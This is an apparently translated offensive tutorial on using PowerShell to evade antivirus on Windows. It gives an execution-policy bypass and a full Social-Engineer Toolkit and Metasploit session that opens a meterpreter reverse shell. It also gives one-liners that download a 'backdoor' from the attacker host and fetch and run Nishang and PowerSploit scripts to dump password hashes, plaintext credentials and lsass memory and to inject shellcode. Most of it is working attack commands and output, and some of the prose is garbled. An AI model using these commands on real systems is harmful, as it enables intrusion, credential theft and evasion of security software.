Powershell tricks: Bypass AV

Powershell tricks: Bypass AV
0x00 Powershell Introduction

Powershell is like bash in linux and can be used by Powershell in windows. NET Framework is powerful and can also call windows APIs. After win7/server 2008, powershell has been integrated into the system. The powerful features of Powershell bring great convenience to windows Management and facilitate penetration testing in windows.

0x01 PowerShell Execution Policy

By default, Powershell scripts cannot be double-clicked or executed in cmd. This policy must be bypassed in some ways during execution. The simplest example is to execute powershell.exe to append the command to be executed, or directly copy the script to be executed into the powershell window. You can also Download and execute, as shown in the following example.

If you need to execute the ps1 file, you can also do this:

PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1

 

We do not recommend that you use other methods to change the execution policy globally. If the scenario is different, you can select the execution method as needed.

0x02 Reverse the Shell

In case of protection software, you can use powershell to execute shellcode to return shell. The execution script can be generated by msf or set toolkit. Note that the ps1 file generated by msf is the bat file generated by set. The following process is generated in set:

Select from the menu:   1) Social-Engineering Attacks   2) Fast-Track Penetration Testing   3) Third Party Modules   4) Update the Metasploit Framework   5) Update the Social-Engineer Toolkit   6) Update SET configuration   7) Help, Credits, and About  99) Exit the Social-Engineer Toolkitset> 1..SNIP... Select from the menu:   1) Spear-Phishing Attack Vectors   2) Website Attack Vectors   3) Infectious Media Generator   4) Create a Payload and Listener   5) Mass Mailer Attack   6) Arduino-Based Attack Vector   7) SMS Spoofing Attack Vector   8) Wireless Access Point Attack Vector   9) QRCode Generator Attack Vector  10) Powershell Attack Vectors  11) Third Party Modules  99) Return back to the main menu.set> 10The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful  landscape for deploying payloads and performing functions that  do not get triggered by preventative technologies.   1) Powershell Alphanumeric Shellcode Injector   2) Powershell Reverse Shell   3) Powershell Bind Shell   4) Powershell Dump SAM Database  99) Return to Main Menuset:powershell>1set> IP address for the payload listener: 192.168.200.159set:powershell> Enter the port for the reverse [443]:4444[*] Prepping the payload for delivery and injecting alphanumeric shellcode...[*] Generating x86-based powershell injection code...[*] Finished generating powershell injection bypass.[*] Encoded to bypass execution restriction policy...[*] If you want the powershell commands and attack, they are exported to /root/.set/reports/powershell/set> Do you want to start the listener now [yes/no]: : yes..SNIP...[*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.resource (/root/.set/reports/powershell/powershell.rc)> use multi/handlerresource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpresource (/root/.set/reports/powershell/powershell.rc)> set lport 4444lport => 4444resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0LHOST => 0.0.0.0resource (/root/.set/reports/powershell/powershell.rc)> exploit -j[*] Exploit running as background job.msf exploit(handler) > [*] Started reverse handler on 0.0.0.0:4444 [*] Starting the payload handler...[*] Sending stage (769024 bytes) to 192.168.200.158[*] Meterpreter session 1 opened (192.168.200.159:4444 -> 192.168.200.158:49818) at 2014-10-23 18:17:35 +0800msf exploit(handler) > sessions Active sessions===============  Id  Type                   Information                               Connection  --  ----                   -----------                               ----------  1   meterpreter x86/win32  WIN-M49V8M0CSH2\server @ WIN-M49V8M0CSH2  192.168.200.159:4444 -> 192.168.200.158:49818 (192.168.200.158)

The generated file is under/root/. set/reports/powershell. Specifically, x86_powershell_injection.txt is the bat file and can be renamed directly for running. Here is a tip to use powershell to directly download files in one sentence.

powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.200.159/backdoor','backdoor.bat')

Then execute the command to get the meterpreter session.

The command cmd and dump hash plaintext can be executed normally.

0x03 Dump the hash

Of course, you can also use powershell when you only need dump hash.

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes

0x04 Dump the plain Password

You can also use the following method (execute Mimikatz of powershell) to obtain the plaintext.

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts

It is worth noting that the Mimikatz Command can also be executed through the Command parameter here.

0x05 Memory Dumping

Powershell can also do the same job as procdump to get the dumps of a process. In this example, the dumps of lsass.exe is obtained, and Mimikatz is used to obtain plaintext from dumps.

Then download the lsass dumps file and use Mimikatz for analysis to obtain the plaintext password.

Of course, the memory dumps can not only obtain the windows Password, but may store other important information or data in the process memory. See http://blog.spiderlabs.com/2012/07/pentesting-like-an-eastern-european.html.

0x06 Execute the shellcode

Powershell is very convenient to call windows APIs because of its rich extension functions, so it can also execute shellcode. This process is as follows:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode –help

However, there is a problem here, that is, there are few existing shellcode in x64, And the shellcode collected on the internet is usually x86. If you directly execute the shellcode of x86, an error occurs.

Worker executes the shellcode of x86. The process is as follows:

c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Shellcode 0x90,0x90,0x90 ...

This process applies to the shellcode generated by most msfpayload instances. Of course, you can also use other methods to execute shellcode in windows, such as shellcodeexec. However, this method cannot be bypass AV. However, you can use bypass based on the source code.

To be continued.